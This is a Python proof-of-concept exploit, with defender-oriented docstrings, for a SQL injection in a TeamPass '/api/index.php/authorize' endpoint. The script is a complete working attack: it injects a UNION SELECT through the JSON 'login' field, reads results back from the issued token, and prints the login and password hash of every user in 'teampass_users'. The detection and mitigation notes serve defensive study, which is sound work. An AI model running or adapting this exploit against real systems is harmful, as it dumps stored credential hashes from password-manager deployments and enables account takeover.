"""Proof-of-concept client for a SQL injection in an ``/api/index.php/authorize`` endpoint.

Read this as a defender: the whole exchange is a handful of plain HTTP
requests that a reverse proxy, WAF, request log or IDS can see.

What the script sends
  * one GET to ``<base_url>/api/index.php/authorize`` to learn whether the
    API feature is enabled (the server answers "API usage is not allowed"
    when it is not), then
  * one JSON POST per query to the same URL whose ``login`` field carries a
    ``' UNION SELECT ... FROM teampass_users WHERE login='admin`` payload
    and whose ``password``/``apikey`` fields are fixed filler values.

Detection
  * POST bodies to ``/api/index.php/authorize`` containing ``UNION SELECT``
    or an unbalanced quote in the ``login`` field (the injection travels in
    the JSON body, not the query string, so URL-only filtering will not
    see it);
  * bursts of such POSTs against the same endpoint, two per enumerated
    account (one for ``login``, one for ``pw``);
  * a token being issued for a ``login`` value that is not a real account.

Mitigation
  * keep the API feature disabled where it is not needed -- the script
    aborts on the "API usage is not allowed" response;
  * bind the ``login`` value as a query parameter so it can never change the
    shape of the ``authorize`` statement;
  * if this traffic is found in logs, treat every hash in
    ``teampass_users.pw`` as exposed: the script's final loop prints
    ``login``/``pw`` pairs for every user with a non-empty ``pw``.
"""

import sys
import requests  # third-party; the only network dependency
import base64
import re  # unused in this file
import json
import subprocess  # unused in this file


def main() -> None:
    """Probe the target, then enumerate ``login``/``pw`` pairs through the injection.

    Reads the base URL from ``sys.argv[1]``; exits with status 1 when the
    argument is missing, the API feature is disabled, the probe request
    fails, or the user count cannot be read.
    """
    if len(sys.argv) < 2:
        # NOTE(review): the argument placeholder after argv[0] appears to have
        # been lost (likely in extraction); the script expects the base URL.
        print(f"Usage: {sys.argv[0]} ")
        sys.exit(1)
    base_url = sys.argv[1]
    vulnerable_url = f"{base_url}/api/index.php/authorize"

    # Probe: the server's "API usage is not allowed" text means the API
    # feature toggle is off, which is the single switch that stops this
    # script. Any other request error also aborts.
    try:
        response = requests.get(vulnerable_url)
        if "API usage is not allowed" in response.text:
            print("API feature is not enabled :-(")
            sys.exit(1)
    except requests.RequestException as e:
        print(f"Error: {e}")
        sys.exit(1)

    # Generate arbitrary hash
    # A bcrypt-formatted string ($2y$10$...) that the UNION row substitutes
    # for the stored password hash; presumably it is the hash of the fixed
    # "password" value sent below -- cannot be confirmed from this file.
    arbitrary_hash = '$2y$10$u5S27wYJCVbaPTRiHRsx7.iImx/WxRA8/tKvWdaWQ/iDuKlIkMbhq'

    def exec_sql(query: str) -> str | None:
        """Return the scalar result of ``query`` as read back from the issued token, or None.

        The ``login`` field closes the original string literal and appends a
        UNION SELECT whose third column is ``(query)``; the script expects that
        column to come back as the ``public_key`` claim of the token the
        endpoint issues, so it base64-decodes the token's second segment and
        reads ``public_key`` from the JSON.

        Returns None when the request fails, no token is returned, or the token
        has fewer than two dot-separated segments.

        NOTE(review): only ``requests.RequestException`` is caught; a decode or
        JSON error on a malformed token propagates instead of returning None.
        Standard (not URL-safe) base64 is used for the payload segment.
        """
        inject = f"none' UNION SELECT id, '{arbitrary_hash}', ({query}), private_key, personal_folder, fonction_id, groupes_visibles, groupes_interdits, 'foo' FROM teampass_users WHERE login='admin"
        # The injection rides in the JSON body; "password" and "apikey" are
        # fixed filler values and never change between calls.
        data = {
            "login": inject,
            "password": "h4ck3d",
            "apikey": "foo"
        }
        headers = {"Content-Type": "application/json"}
        try:
            response = requests.post(vulnerable_url, headers=headers, json=data)
            response.raise_for_status()
            token = response.json().get('token', '')
            if not token:
                return None
            # Extract public_key from token
            # Second dot-separated segment = the token payload.
            parts = token.split('.')
            if len(parts) < 2:
                return None
            payload = parts[1]
            # Fix padding if necessary
            payload += '=' * ((4 - len(payload) % 4) % 4)
            decoded = base64.b64decode(payload)
            public_key = json.loads(decoded).get('public_key', '')
            return public_key
        except requests.RequestException as e:
            print(f"Error: {e}")
            return None

    # One request for the count, then two per account (login, then pw),
    # ordered by login so LIMIT i,1 addresses the same row both times.
    users = exec_sql("SELECT COUNT(*) FROM teampass_users WHERE pw != ''")
    if users is None:
        print("Failed to get user count")
        sys.exit(1)
    print(f"There are {users} users in the system:")
    for i in range(int(users)):
        username = exec_sql(f"SELECT login FROM teampass_users WHERE pw != '' ORDER BY login ASC LIMIT {i},1")
        password = exec_sql(f"SELECT pw FROM teampass_users WHERE pw != '' ORDER BY login ASC LIMIT {i},1")
        if username is not None and password is not None:
            print(f"{username}: {password}")


if __name__ == "__main__":
    main()